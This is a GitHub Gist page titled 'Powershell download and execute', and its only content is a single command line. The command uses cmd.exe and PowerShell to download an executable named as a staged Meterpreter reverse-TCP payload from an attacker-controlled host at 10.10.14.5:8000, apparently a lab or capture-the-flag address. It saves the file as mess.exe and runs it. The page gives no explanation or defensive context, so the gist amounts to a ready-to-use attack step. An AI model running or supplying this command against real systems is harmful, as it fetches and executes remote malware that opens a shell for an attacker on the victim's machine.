Created
March 18, 2018 10:07
-
-
Save castexyz/f79a9c0e77d855b1420a929ef8dc5bbf to your computer and use it in GitHub Desktop.
Powershell download and execute
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/windows-meterpreter-staged-reverse-tcp-9877.exe','mess.exe');Start-Process 'mess.exe' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment